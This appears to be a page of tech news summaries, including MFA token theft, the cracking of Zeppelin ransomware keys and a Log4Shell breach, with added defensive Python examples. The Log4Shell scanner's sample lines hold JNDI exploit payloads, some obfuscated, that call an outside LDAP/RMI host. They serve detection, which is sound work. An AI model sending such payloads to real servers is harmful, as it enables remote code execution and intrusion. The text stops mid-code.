Windows

Windows 8.1 Support Ends January 10 (pcworld.com)

Mark Hachman, writing for PCWorld: Windows 8 stunk. It might have helped cost chief executive Steve Ballmer his job. Windows 8.1 was a bit better -- but if you love it, you have only a month or so left to enjoy it. Microsoft will kill off Windows 8.1 support on January 10, 2023. There's no out: Microsoft will not be offering an extended support package for Windows 8.1. At that point, you'll have a choice: buy a new Windows PC, or officially pay to upgrade to either Windows 10 or Windows 11. What does the end of support mean? Until January 10, Microsoft will offer security patches and other fixes for any security issues that crop up. Afterwards, you're on your own. If any exploit or malware surfaces, you'll have to depend on any antivirus software you have running -- Microsoft won't be issuing any more patches after Jan. 10, and your PC will absolutely be at risk.
Encryption

Amazon Plans To Close Up Shop on Wickr's User-Centric Encrypted Messaging App (gizmodo.com)

An anonymous reader shares a report: A little more than a year ago, Amazon, specifically Amazon Web Services, flashed its stacks of cash as it announced it was buying up the end-to-end encrypted messaging app Wickr. AWS users could suddenly use Wickr's services, and some reporters speculated Amazon could have been trying to make a move in the increasingly crowded encrypted messaging space. That's much more unlikely now as Amazon announced Monday it was nixing its secure messaging app Wickr Me.

The tech giant said that Wickr would instead be focused on business and public sector communications, specifically through AWS Wickr and Wickr Enterprise. The company will no longer allow registrations for Wickr Me after Dec. 31, and a year later, at the tail end of 2023, the app will be but a puff of smoke and a memory. Wickr was worth in the ballpark of $60 million when it was purchased, but just a few years ago Wickr was spouting off about its features that encrypted conference calls, which was a major evolution in the encrypted messaging space. Amazon's other messaging app, Chime, does videoconferencing without encryption. In September, Amazon finally added end-to-end encryption for the data sent to users through its Ring doorbells.

IT

Did the Pandemic Change Our Attitudes About Work? (washingtonpost.com)

Through 2020 America's professional lives "had taken on the overtones of a secular religion," argues a writer in the Washington Post, with jobs forming "a primary way to find meaning in the world and a crucial part of our identity.... Even precarious, low-paying gigs were valorized as 'hustle culture,' representing freedom to perform labor on our terms."

But then... Fast-forward to fall 2022. The number of people quitting, while down from the peak, remains at the highest level since the 1970s. White-collar workers don't want to give up working remotely. Low-paying sectors such as the hospitality industry can't find enough people willing to work for the wages on offer. Union organizing and strikes have been on an upswing.... [W]hat's increasingly clear is that the March 2020 decision to partially close down the American economy shattered Americans' dysfunctional, profoundly unequal relationship with work like nothing in decades. And even if there was great discomfort in a shutdown that severed almost every one of us from assumptions about how we earn a living, we also found an unexpected opportunity: to remake our relationship with the labor that fills our days....

All of it — the lockdowns, the disease, the sudden change in household functioning and how or whether we worked at all — amounted to a massive psychological shock, leading many to ask why labor looms so large in our psyches. "It really was an opportunity — an unwelcome opportunity — to take a look at the mad scramble that many of us have just assumed was normal," said Kate Shindle, who as president of the Actors' Equity Association represents a particularly hard-hit industry. Then, when the economy unexpectedly boomed back, Americans were poised to pivot. As many had recognized, it was one thing to seek meaning in work but another to see our lives subsumed by it — and for what? A less-than-adequate paycheck? A job that could literally kill you? "Maybe the poor safety net really kept people from analyzing the role of work in their lives," David Blustein, author of "The Importance of Work in an Age of Uncertainty" and a professor at Boston College's Lynch School of Education and Human Development, told me. "Maybe the American work ethic was a form of survival...."

Over and over, when people spoke to journalists, including me, about why they made changes in their professional lives since March 2020, they told us they liked receiving better wages when they switched employers. But even more, they wanted greater control over the terms of their labor.... An increased level of remote work, likely in a hybrid format, is almost certainly here to stay, says Nick Bloom, a professor of economics at Stanford University, who has studied the topic for decades. Employees want it, technological advances continue to make it easier, and companies that forbid it completely are likely to find themselves at a disadvantage....

The past two and a half years brought immense upheaval, and we'll be struggling to process the resulting changes for years. But it's undeniable that some of these shifts were long overdue. Workers are highly unlikely to forget what we learned: namely, that our jobs are much more flexible than we thought.

AI

Will Neural Sensors Lead to Workplace Brain Scanning? (ieee.org)

"Get ready: Neurotechnology is coming to the workplace," claims IEEE Spectrum: Neural sensors are now reliable and affordable enough to support commercial pilot projects that extract productivity-enhancing data from workers' brains.

These projects aren't confined to specialized workplaces; they're also happening in offices, factories, farms, and airports. The companies and people behind these neurotech devices are certain that they will improve our lives. But there are serious questions about whether work should be organized around certain functions of the brain, rather than the person as a whole.

To be clear, the kind of neurotech that's currently available is nowhere close to reading minds. Sensors detect electrical activity across different areas of the brain, and the patterns in that activity can be broadly correlated with different feelings or physiological responses, such as stress, focus, or a reaction to external stimuli. These data can be exploited to make workers more efficient — and, proponents of the technology say, to make them happier. Two of the most interesting innovators in this field are the Israel-based startup InnerEye, which aims to give workers superhuman abilities, and Emotiv, a Silicon Valley neurotech company that's bringing a brain-tracking wearable to office workers, including those working remotely....

EEG has recently broken out of clinics and labs and has entered the consumer marketplace. This move has been driven by a new class of "dry" electrodes that can operate without conductive gel, a substantial reduction in the number of electrodes necessary to collect useful data, and advances in artificial intelligence that make it far easier to interpret the data. Some EEG headsets are even available directly to consumers for a few hundred dollars.

Microsoft

Microsoft: Hackers Using 'Concerning' Tactic To Dodge Multi-Factor Authentication

Microsoft says token theft attacks are on the rise. From a report: Microsoft has outlined several mitigations to protect against attacks on multi-factor authentication that will unfortunately make life more difficult for your remote workers. Three years ago, attacks on multi-factor authentication (MFA) were so rare that Microsoft didn't have decent statistics on them, largely because few organisations had enabled MFA. But with MFA use rising as attacks on passwords become more common, Microsoft has seen an increase in attackers using token theft in their attempts to sidestep MFA.

In these attacks, the attacker compromises a token issued to someone who's already completed MFA and replays that token to gain access from a different device. Tokens are central to OAuth 2.0 identity platforms, including Azure Active Directory (AD), which aim to make authentication simpler and faster for users, but in a way that's still resilient to password attacks. Moreover, Microsoft warns that token theft is dangerous because it doesn't require high technical skills, detection is difficult and, because the technique has only recently seen an uptick, few organisations have mitigations in place. "Recently, the Microsoft Detection and Response Team (DART) has seen an increase in attackers utilizing token theft for this purpose," Microsoft says in a blogpost. "By compromising and replaying a token issued to an identity that has already completed multifactor authentication, the threat actor satisfies the validation of MFA and access is granted to organizational resources accordingly. This poses to be a concerning tactic for defenders because the expertise needed to compromise a token is very low, is hard to detect, and few organizations have token theft mitigations in their incident response plan."
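
Token replay is hard to spot because the replayed token is valid and MFA shows as satisfied; what does change is the device and network the token arrives from. The following is an added example, not Microsoft's detection logic or DART's tooling: it runs a simple session-binding heuristic over constructed sign-in events in a simplified Azure AD-like schema. The field names (sessionId, deviceId, os, ip, mfa) are assumptions for the example and do not match any product's log format exactly.

```python
"""Heuristic detection of MFA token replay across devices.

Added example, not Microsoft's code. Runs over constructed sign-in events
in a simplified, Azure AD-like schema; the field names are assumptions.
"""
import json

# Constructed sample events (not real log data), one JSON object per line,
# the way a SIEM export might deliver them.
SAMPLE_LOG = """
{"time": "2022-11-17T09:00:00Z", "user": "alice", "sessionId": "S1", "deviceId": "D1", "os": "Windows 10", "ip": "10.0.0.5", "mfa": true}
{"time": "2022-11-17T09:30:00Z", "user": "alice", "sessionId": "S1", "deviceId": "D1", "os": "Windows 10", "ip": "10.0.0.5", "mfa": false}
{"time": "2022-11-17T11:00:00Z", "user": "alice", "sessionId": "S1", "deviceId": "", "os": "Linux", "ip": "203.0.113.9", "mfa": false}
{"time": "2022-11-17T08:00:00Z", "user": "bob", "sessionId": "S2", "deviceId": "D2", "os": "macOS", "ip": "10.0.0.8", "mfa": true}
{"time": "2022-11-17T13:00:00Z", "user": "bob", "sessionId": "S2", "deviceId": "D2", "os": "macOS", "ip": "198.51.100.4", "mfa": false}
"""


def parse_events(text):
    """One JSON object per non-empty line."""
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def detect_token_replay(events):
    """Flag a session that satisfied MFA on one device and is later presented
    from a different device without a fresh MFA.

    The binding key is (deviceId, os), deliberately not the IP address: a
    legitimate laptop moving between networks keeps its device identity,
    whereas a replayed token arrives with the attacker's device details.
    """
    bindings = {}   # sessionId -> device fingerprint recorded at MFA time
    alerts = []
    # ISO-8601 timestamps in a single zone sort correctly as strings.
    for ev in sorted(events, key=lambda e: e["time"]):
        sid = ev["sessionId"]
        fingerprint = (ev["deviceId"], ev["os"])
        if ev["mfa"]:
            # A completed MFA (re)binds the session to the device it happened on.
            bindings[sid] = {"user": ev["user"], "fingerprint": fingerprint, "ip": ev["ip"]}
            continue
        bound = bindings.get(sid)
        if bound is None:
            # No MFA on record for this session (single-factor apps land here);
            # not evidence of replay on its own.
            continue
        if bound["fingerprint"] != fingerprint:
            alerts.append({
                "user": ev["user"],
                "sessionId": sid,
                "time": ev["time"],
                "bound_device": bound["fingerprint"],
                "seen_device": fingerprint,
                "bound_ip": bound["ip"],
                "seen_ip": ev["ip"],
                "reason": "MFA-backed session reused from a different device without new MFA",
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_token_replay(parse_events(SAMPLE_LOG)):
        print(json.dumps(alert))
```

The check keys on device identity rather than IP, so bob's laptop roaming to a new network does not fire, while alice's session presented from an unknown Linux host does. On a hit, the response is to revoke the user's refresh tokens and force a new sign-in: blocking the source IP leaves the stolen token usable from anywhere else.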
Encryption

Researchers Quietly Cracked Zeppelin Ransomware Keys (krebsonsecurity.com)

Brian Krebs writes via KrebsOnSecurity: Peter is an IT manager for a technology manufacturer that got hit with a Russian ransomware strain called "Zeppelin" in May 2020. He'd been on the job less than six months, and because of the way his predecessor architected things, the company's data backups also were encrypted by Zeppelin. After two weeks of stalling their extortionists, Peter's bosses were ready to capitulate and pay the ransom demand. Then came the unlikely call from an FBI agent. "Don't pay," the agent said. "We've found someone who can crack the encryption." Peter, who spoke candidly about the attack on condition of anonymity, said the FBI told him to contact a cybersecurity consulting firm in New Jersey called Unit 221B, and specifically its founder -- Lance James. Zeppelin sprang onto the crimeware scene in December 2019, but it wasn't long before James discovered multiple vulnerabilities in the malware's encryption routines that allowed him to brute-force the decryption keys in a matter of hours, using nearly 100 cloud computer servers.

In an interview with KrebsOnSecurity, James said Unit 221B was wary of advertising its ability to crack Zeppelin ransomware keys because it didn't want to tip its hand to Zeppelin's creators, who were likely to modify their file encryption approach if they detected it was somehow being bypassed. This is not an idle concern. There are multiple examples of ransomware groups doing just that after security researchers crowed about finding vulnerabilities in their ransomware code. "The minute you announce you've got a decryptor for some ransomware, they change up the code," James said. But he said the Zeppelin group appears to have stopped spreading their ransomware code gradually over the past year, possibly because Unit 221B's referrals from the FBI let them quietly help nearly two dozen victim organizations recover without paying their extortionists. [...]

The researchers said their break came when they understood that while Zeppelin used three different types of encryption keys to encrypt files, they could undo the whole scheme by factoring or computing just one of them: An ephemeral RSA-512 public key that is randomly generated on each machine it infects. "If we can recover the RSA-512 Public Key from the registry, we can crack it and get the 256-bit AES Key that encrypts the files!" [James and co-author Joel Lathrop wrote in a blog post]. "The challenge was that they delete the [public key] once the files are fully encrypted. Memory analysis gave us about a 5-minute window after files were encrypted to retrieve this public key." Unit 221B ultimately built a "Live CD" version of Linux that victims could run on infected systems to extract that RSA-512 key. From there, they would load the keys into a cluster of 800 CPUs donated by hosting giant Digital Ocean that would then start cracking them. The company also used that same donated infrastructure to help victims decrypt their data using the recovered keys.
A more technical writeup on Unit 221B's discoveries (cheekily titled "0XDEAD ZEPPELIN") is available here.
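
The weakest link in the hierarchy the post describes is the 512-bit RSA key: moduli of that size have been factorable with academic resources since RSA-155 fell in 1999, and with rented cloud CPUs it is a matter of hours. The following is an added example, not Unit 221B's tool and not the malware's code: it re-creates the key hierarchy at toy scale so the factoring step runs in well under a second. The RSA modulus is shrunk to about 64 bits (two 32-bit primes), the wrapped file key to 56 bits, and AES is replaced by a SHA-256 keystream stand-in; all of those are assumptions for the example. The shape of the recovery is the same as described: factor n, rebuild the private exponent, unwrap the file key, decrypt the files.

```python
"""Toy-scale re-creation of the Zeppelin key hierarchy.

Added example, not Unit 221B's tool or the malware's code. Modulus, key
size and the file cipher are all shrunk/substituted so the crack runs fast.
"""
import hashlib
import math
import random
import secrets


def is_probable_prime(n, rounds=20, rng=random):
    """Miller-Rabin primality test."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13):
        if n % p == 0:
            return n == p
    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True


def random_prime(bits, rng):
    """Random odd prime with the top bit set."""
    while True:
        cand = rng.getrandbits(bits) | (1 << (bits - 1)) | 1
        if is_probable_prime(cand, rng=rng):
            return cand


def rsa_keygen(prime_bits, rng):
    """Textbook RSA: returns (n, e, d)."""
    e = 65537
    while True:
        p, q = random_prime(prime_bits, rng), random_prime(prime_bits, rng)
        phi = (p - 1) * (q - 1)
        if p != q and math.gcd(e, phi) == 1:
            return p * q, e, pow(e, -1, phi)


def pollard_rho(n, rng):
    """Pollard's rho (Floyd cycle finding); returns a non-trivial factor of composite n."""
    if n % 2 == 0:
        return 2
    while True:
        c = rng.randrange(1, n)
        x = y = rng.randrange(2, n)
        g = 1
        while g == 1:
            x = (x * x + c) % n
            y = (y * y + c) % n
            y = (y * y + c) % n
            g = math.gcd(abs(x - y), n)
        if g != n:
            return g


def keystream_xor(key, data):
    """Stand-in for AES-CTR: SHA-256(key || counter) as keystream. Not AES."""
    out = bytearray()
    for off in range(0, len(data), 32):
        block = hashlib.sha256(key + off.to_bytes(8, "big")).digest()
        out.extend(a ^ b for a, b in zip(data[off:off + 32], block))
    return bytes(out)


KEY_BYTES = 7   # 56-bit file key; must be numerically smaller than the toy modulus


def infect(plaintext, rng):
    """Ransomware side: ephemeral RSA key pair, fresh file key wrapped under it,
    private exponent thrown away. The victim keeps only (n, e), the wrapped key
    and the ciphertext."""
    n, e, _d = rsa_keygen(32, rng)
    file_key = secrets.token_bytes(KEY_BYTES)
    wrapped = pow(int.from_bytes(file_key, "big"), e, n)
    return (n, e), wrapped, keystream_xor(file_key, plaintext)


def recover(public_key, wrapped, ciphertext, rng):
    """Cracking side: factor n, rebuild d, unwrap the file key, decrypt."""
    n, e = public_key
    p = pollard_rho(n, rng)
    q = n // p
    d = pow(e, -1, (p - 1) * (q - 1))
    file_key = pow(wrapped, d, n).to_bytes(KEY_BYTES, "big")
    return file_key, keystream_xor(file_key, ciphertext)


if __name__ == "__main__":
    doc = b"quarterly-backups.tar (constructed sample content)"
    pub, wrapped_key, ct = infect(doc, random.Random())
    key, pt = recover(pub, wrapped_key, ct, random.Random())
    print(pt == doc, key.hex())
```

Pollard's rho is enough for a 64-bit toy modulus; a real 512-bit modulus needs the general number field sieve, which is what the "nearly 100 cloud computer servers" were running. The operational lesson from the post survives the scaling: the public key has to be captured before the malware deletes it, and once it is, the per-victim file key falls out of a single factoring job rather than any weakness in AES.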
OS X

Nearly 50% of macOS Malware Comes From One App (neowin.net)

joshuark writes: Yikes, gadzooks, and shiver my timbers! Elastic Labs has found surprisingly that 50% of malware comes from one app: MacKeeper, ironically. Ironic in that MacKeeper claims to "keep your Mac clean and safe with zero effort." MacKeeper also has a tainted reputation for being difficult to completely uninstall and as a malicious antivirus.

A new spin on the biblical phrase, "Am I my brother's keeper..." Well, when the inmate is running the asylum.
The findings appear in Elastic Security Labs' recently released 2022 Global Threat Report. As Neowin reports, MacKeeper "can be abused by threat actors because it has extensive permissions and access to processes and files."

With that said, the report found that only 6.2% of malware ends up on macOS devices, compared to 54.4% and 39.4% on Windows and Linux, respectively.
Privacy

1Password Embraces a Passwordless Future (theverge.com)

1Password has announced that passkey support will be available to its customers in "early 2023," allowing users to securely log in to apps and websites without a password. The Verge reports: Passkeys are a passwordless login technology developed by the FIDO Alliance, whose members include most of the Big Tech companies. The tech allows users to replace traditional passwords with their device's own authentication -- such as an iPhone with Face ID -- offering greater security and protection since there's no password to steal or accidentally hand over via a phishing attack.

1Password claims its own variation, called Universal Sign On, will be superior to others by supporting multiple platforms and cross-platform syncing when it launches next year. By contrast, passkey support through companies like Apple is only built to seamlessly synchronize access on devices within the same ecosystem. A live demonstration of how passkeys will work is available for 1Password users using the latest version of its Chrome browser extension, alongside a video demo for those not using the service and a directory listing which websites, apps, and services are using passkeys for authentication. 1Password will bring full support for passkeys to its browser extension and desktop apps in early 2023, with mobile support to follow.

The Courts

Nvidia Hit With Class Action Suit Over Melting RTX 4090 GPU Adapters

A frustrated owner of an RTX 4090 graphics card, suffering from the infamous melty power connector problem, has filed a class action suit against Nvidia. From a report: Filed in a California court on November 11th, the suit may make for painful reading for Nvidia and includes numerous allegations from fraud to unjust enrichment. The case refers to widely reported instances of the new-style 16-pin power connector used by Nvidia's GeForce RTX 4090 boards overheating and melting under heavy load. Reportedly, the lawsuit claims that Nvidia sold RTX 4090s with, "defective and dangerous power cable plug and socket(s), which has rendered consumers' cards inoperable and poses a serious electrical and fire hazard for each and every purchaser." It's notable that the claimant, one Lucas Genova, describes himself as "experienced in the installation of computer componentry like graphics cards," thereby aiming to head off any implication of user error at the pass.
Technology

USB-C Will Be Mandatory For All Smart Devices Sold in India (livemint.com)

India will be adopting USB-C type as a common charging port for smart devices, with stakeholders reaching a consensus at a meeting of an inter-ministerial task force, consumer affairs secretary Rohit Kumar Singh said on Wednesday. From a report: The government held wide-ranging consultations to standardize charging ports for all compatible smart devices, but it is yet to reach a decision on chargers for low-cost feature phones. With universal chargers consumers will no longer need a different charger every time they purchase a new device. Besides, the move will also reduce massive amounts of e-waste. In 2021, India is estimated to have generated 5 million tonnes of e-waste, only behind China and the US, according to an ASSOCHAM-EY report, Electronic Waste Management in India.
Windows

Windows 10 Still Having Problems With the Desktop and Taskbar (theregister.com)

Microsoft has fixed yet another problem in some versions of Windows 10, a bug that makes the taskbar and desktop temporarily vanish or causes the system to ignore you. From a report: According to Redmond, users "might experience an error in which the desktop or taskbar might momentarily disappear, or your device might become unresponsive." The issue affects PCs running Windows 10 versions 22H2, 21H2, 21H1, and 20H2, the company wrote on its Windows Health Dashboard. Microsoft didn't outline the exact cause but notes it was related to the KB5016688 220820_03051 cumulative update and later.

The software giant is using its Known Issue Rollback (KIR) feature -- which enables IT administrators to roll back the unwanted changes of an update -- to resolve the problem, adding that it could take up to 24 hours for the fix to reach non-managed business systems and consumer devices. Restarting the device may accelerate the timeframe. Organizations that use enterprise-managed devices can install and configure a special Group Policy by going to "Computer Configuration" and then "Administrative Templates" and "Group Policy name." If the resolution doesn't work, users can try restarting the Windows device, according to Microsoft. The latest fix comes after a number of other problems were resolved this week.

Microsoft

Microsoft's SQL Server 2022 is All About Azure (techcrunch.com)

Microsoft has released SQL Server 2022, the latest version of its database software, which originally launched more than 33 years ago. From a report: Microsoft describes this release as the "most Azure-enabled release of SQL Server yet" and with connections to Azure Synapse Link for enabling real-time analytics over the database, Azure Purview for data governance and disaster recovery with the help of Azure SQL Managed Instance, this release is, in many ways, the culmination of the cloud-connection groundwork the team started quite a few years ago. "From the very beginning, the vision [for SQL Server] really was about -- databases were very complex -- how do you make that extremely simple? And in many ways, I think that has been a key reason why it lasted for so long and how we've evolved it as well," Rohan Kumar, Microsoft's corporate VP for Azure Data, told me. "One of the big things that I think about with SQL Server 2022 is that we've made it completely cloud-connected to Azure."

He noted that while the migration of on-prem workloads is happening, Microsoft's customers are all moving at very different speeds and some, for a multitude of reasons, may never move to the cloud at all. That, he argues, is why the company always bet on a hybrid approach, but it is also why a lot of customers started asking about how they could get the value of being in the cloud without actually having to move all of their data to it. "That was really the key thesis of why we invested in making this into a cloud release," Kumar said. A good example here is the new disaster recovery function that allows users to replicate their data in SQL Managed Instance on Azure and use that as a backup for their main on-premises SQL Server, which should make it easy to fail over to that when the main server goes down.

Security

Iranian Hackers Breached Federal Agency Using Log4Shell Exploit (bleepingcomputer.com)

An anonymous reader quotes a report from BleepingComputer: The FBI and CISA revealed in a joint advisory published today that an unnamed Iranian-backed threat group hacked a Federal Civilian Executive Branch (FCEB) organization to deploy XMRig cryptomining malware. The attackers compromised the federal network after hacking into an unpatched VMware Horizon server using an exploit targeting the Log4Shell (CVE-2021-44228) remote code execution vulnerability. After deploying the cryptocurrency miner, the Iranian threat actors also set up reverse proxies on compromised servers to maintain persistence within the FCEB agency's network.

"In the course of incident response activities, CISA determined that cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto mining software, moved laterally to the domain controller (DC), compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence," the joint advisory reads. The two U.S. federal agencies added that all organizations who haven't yet patched their VMware systems against Log4Shell should assume that they've already been breached and advise them to start hunting for malicious activity within their networks.

CISA warned in June that VMware Horizon and Unified Access Gateway (UAG) servers are still being preyed upon by multiple threat actors, including state-sponsored hacking groups, using Log4Shell exploits. Log4Shell can be exploited remotely to target vulnerable servers exposed to local or Internet access to move laterally across breached networks to access internal systems that store sensitive data.
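CISA's advice to assume compromise and hunt applies to any Log4j-backed application that logs attacker-controlled strings, which for Horizon includes request headers. The following is an added example, not CISA's or VMware's tooling: it scans constructed Apache-style access-log lines (the payloads ride in the user-agent field) for Log4j lookup strings and collapses the nested-lookup obfuscation that defeats a plain search for "jndi:". The resolver approximates only the Log4j lookups attackers use for that obfuscation (lower, upper and the ":-" default-value syntax); everything else about the lines is constructed for the example.

```python
"""Hunting for Log4Shell exploitation attempts in request logs.

Added example, not CISA's or VMware's tooling. The lookup resolver only
approximates the Log4j lookups that matter for de-obfuscation.
"""
import re

# Innermost ${...} with no nested lookup inside it.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def resolve_lookup(body):
    """Resolve one innermost lookup body, or return None to leave it in place."""
    if body.startswith("::-"):                  # ${::-j}       -> "j"
        return body[3:]
    kind, sep, arg = body.partition(":")
    if sep and kind.lower() == "lower":         # ${lower:J}    -> "j"
        return arg.lower()
    if sep and kind.lower() == "upper":         # ${upper:j}    -> "J"
        return arg.upper()
    if ":-" in body:                            # ${env:NOPE:-j} -> "j" (lookup fails, default used)
        return body.split(":-", 1)[1]
    return None                                 # jndi:, java:, unknown: keep as-is


def normalize(text, max_passes=32):
    """Repeatedly collapse innermost lookups until nothing more resolves."""
    for _ in range(max_passes):
        changed = False

        def replace(m):
            nonlocal changed
            resolved = resolve_lookup(m.group(1))
            if resolved is None:
                return m.group(0)
            changed = True
            return resolved

        text = INNER_LOOKUP.sub(replace, text)
        if not changed:
            break
    return text


def scan(log_lines):
    """Return (line_number, severity, normalized_line) for suspicious lines.
    'jndi' = a JNDI lookup after de-obfuscation; 'lookup' = any other ${...}."""
    hits = []
    for lineno, line in enumerate(log_lines, 1):
        normalized = normalize(line)
        if JNDI.search(normalized):
            hits.append((lineno, "jndi", normalized))
        elif "${" in line:
            hits.append((lineno, "lookup", normalized))
    return hits


# Constructed sample access-log lines; the user-agent field carries the payloads.
SAMPLE_LINES = [
    '10.0.0.5 - - [18/Nov/2022:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [18/Nov/2022:10:01:09 +0000] "GET /portal HTTP/1.1" 200 88 "-" "${jndi:ldap://198.51.100.9:1389/a}"',
    '203.0.113.7 - - [18/Nov/2022:10:01:10 +0000] "GET /portal HTTP/1.1" 200 88 "-" "${${lower:j}ndi:${lower:L}dap://198.51.100.9:1389/b}"',
    '203.0.113.7 - - [18/Nov/2022:10:01:11 +0000] "GET /portal HTTP/1.1" 200 88 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.9:1099/c}"',
    '203.0.113.7 - - [18/Nov/2022:10:01:12 +0000] "GET /portal HTTP/1.1" 200 88 "-" "${${env:NOPE:-j}ndi:${upper:${lower:L}}dap://198.51.100.9:1389/d}"',
    '10.0.0.6 - - [18/Nov/2022:10:02:00 +0000] "GET /api HTTP/1.1" 200 40 "-" "probe/1.0 ${java:version}"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LINES):
        print(*hit)
```

URL-encoded or header-split payloads need decoding before this normalization, and a hit shows an attempt, not a success: confirm exploitation by looking for the outbound LDAP or RMI connection from the server at that timestamp and, as in the advisory, for XMRig and Ngrok artefacts on the host. Any "${" in a user-agent is worth a look even when it never resolves to jndi, which is why the scanner reports those lines at lower severity.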

Security

Netflix Gives Account Holders the Ability To Kick Freeloaders (arstechnica.com)

Netflix has introduced a new account management page called "Manage Access and Devices" that gives users the ability to remove access privileges from specific devices. The feature is available on the web and in the streaming service's Android and iOS apps. Ars Technica reports: Previously, users could see a list of devices that had recently accessed their accounts, and they could revoke access to all devices simultaneously, but they could not revoke access on a case-by-case basis. Each item in the list of devices will include an IP address-based location, a device type, and the user profile that most recently accessed Netflix from that device.

Netflix describes it as a security feature, in that it's useful to users who don't share their passwords at all. For example, you now have a way to clean up after yourself if you stayed at an Airbnb and signed into your Netflix account on the smart TV there but forgot to sign out before you left. Further, the page could help you identify if someone has gained access to your account via a compromised password.

Australia

Australia To Consider Banning Ransomware Payments (therecord.media)

Australia will consider banning ransomware payments in a bid to undermine the cybercriminal business model, a government minister said on Sunday. From a report: Clare O'Neil, the minister for home affairs and cybersecurity, confirmed to Australia's public broadcaster ABC that the government was looking at criminalizing extortion payments as part of the government's cyber strategy. The announcement follows several large security incidents affecting the country, including most significantly the data breach of Medibank, one of the country's largest health insurance providers.

Earlier this month Medibank stated it would not be making a ransom payment after hackers gained access to the data of 9.7 million current and former customers, including 1.8 million international customers living abroad. All of the data which the criminals accessed "could have been taken," the company said. This includes sensitive health care claims data for around 480,000 individuals, including information about drug addiction treatments and abortions. O'Neil's interview followed the AFP's commissioner Reece Kershaw announcing that they had identified the individual perpetrators of the Medibank hack, and that a group based in Russia was to blame.
Further reading: After Ransomware Gang Releases Sensitive Medical Data, Australia Vows Consequences.
Communications

Apple Launches Emergency SOS via Satellite in US and Canada (zdnet.com)

Apple on Tuesday announced that Emergency SOS via satellite is officially available to iPhone 14 users in the US and Canada. Next month, Apple will launch Emergency SOS via satellite in France, Germany, Ireland, and the UK. Apple is enabling the feature on all iPhone 14 models that are running iOS 16.1, which was released near the end of October. From a report: If you have the feature, you'll see a new section detailing your phone's new capability of connecting to satellites, and offering a demo mode for you to get a feel for what the process is like should you ever have to use it. For those unfamiliar, Emergency SOS via Satellite will allow an iPhone 14 owner to contact emergency services when in an area without cellular or Wi-Fi coverage. The feature is triggered by calling 911 when "SOS" is shown at the top of the iPhone's screen where the cellular coverage bars are normally visible. Once you're connected to a satellite, you'll either directly exchange messages with a local dispatcher if they accept text messages, or talk with local emergency services using an Apple-trained emergency specialist as a go-between.
Security

A Simple Android Lock Screen Bypass Bug Landed a Researcher $70,000 (techcrunch.com)

Google has paid out $70,000 to a security researcher for privately reporting an "accidental" security bug that allowed anyone to unlock Google Pixel phones without knowing their passcode. From a report: The lock screen bypass bug, tracked as CVE-2022-20465, is described as a local escalation of privilege bug because it allows someone, with the device in their hand, to access the device's data without having to enter the lock screen's passcode. Hungary-based researcher David Schutz said the bug was remarkably simple to exploit but took Google about five months to fix.

Schutz discovered anyone with physical access to a Google Pixel phone could swap in their own SIM card and enter its preset recovery code to bypass the Android operating system's lock screen protections. In a blog post about the bug, published now that the bug is fixed, Schutz described how he found the bug accidentally, and reported it to Google's Android team.

News

India Lifts Download Ban On VLC (techcrunch.com)

India has lifted the download ban on VLC, more than nine months after it mysteriously blocked the official website of the popular media playback software in the South Asian market. From a report: VideoLAN, the popular software's developer, filed a legal notice last month seeking an explanation from the nation's IT and Telecom ministries for the block order. The Ministry of Electronics and IT has removed its ban on the website of VLC media player, New Delhi-based advocacy group Internet Freedom Foundation, which provided legal support to VideoLAN, said on Monday. VideoLAN confirmed the order. Indian telecom operators began blocking VideoLAN's official website, where it lists links to downloading VLC, in February of this year, VideoLAN president and lead developer Jean-Baptiste Kempf told TechCrunch in an earlier interview. India is one of the largest markets for VLC.
Encryption

'Cryptography's Future Will Be Quantum-Safe. Here's How' (quantamagazine.org)

Fearing the possibility of encryption-cracking quantum computers, Quanta magazine reports that researchers are "scrambling to produce new, 'post-quantum' encryption schemes." Earlier this year, the National Institute of Standards and Technology revealed four finalists in its search for a post-quantum cryptography standard. Three of them use "lattice cryptography" — a scheme inspired by lattices, regular arrangements of dots in space.

Lattice cryptography and other post-quantum possibilities differ from current standards in crucial ways. But they all rely on mathematical asymmetry. The security of many current cryptography systems is based on multiplication and factoring: Any computer can quickly multiply two numbers, but it could take centuries to factor a cryptographically large number into its prime constituents. That asymmetry makes secrets easy to encode but hard to decode.... A quirk of factoring makes it vulnerable to attack by quantum computers.... Originally developed in the 1990s, [lattice cryptography] relies on the difficulty of reverse-engineering sums of points...

Of course, it's always possible that someone will find a fatal flaw in lattice cryptography... Cryptography works until it's cracked. Indeed, earlier this summer one promising post-quantum cryptography scheme was cracked using not a quantum computer, but an ordinary laptop.

At a recent panel discussion on post-quantum cryptography, Adi Shamir (the S in RSA) expressed concern that NIST's proposed solutions are predominantly based on lattice cryptography. "In some sense, we are putting all eggs in the same basket, but that is the best we have....

"The best advice for young researchers is to stay away from lattice-based post-quantum crypto," Shamir added. "What we really lack are entirely different ideas which will turn out to be secure. So any great idea for a new basis for public-key cryptography which is not using lattices will be greatly appreciated."
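
The "sums of points" the article alludes to are Learning With Errors samples: a public vector that is a secret combination of lattice points plus small noise. Without the noise, recovering the secret is linear algebra; with it, no efficient algorithm, classical or quantum, is known. The toy scheme below is an added example, not from the Quanta article or any NIST candidate: it encrypts one bit at a time under a Regev-style construction with parameters (n=16, m=64, q=4093, errors in -2..2) chosen to be readable rather than secure. Those parameters are assumptions for the example; real schemes use much larger n and a different error distribution, but the structure is the one the article describes.

```python
"""A toy lattice (LWE) encryption scheme, to make "sums of points" concrete.

Added example, not from the article or any NIST candidate. Parameters are
far too small to be secure; they are chosen so the arithmetic can be read.
"""
import random

N, M, Q = 16, 64, 4093   # secret length, number of samples, modulus


def keygen(rng):
    """Public key is (A, b = A*s + e mod q): noisy sums of lattice points.
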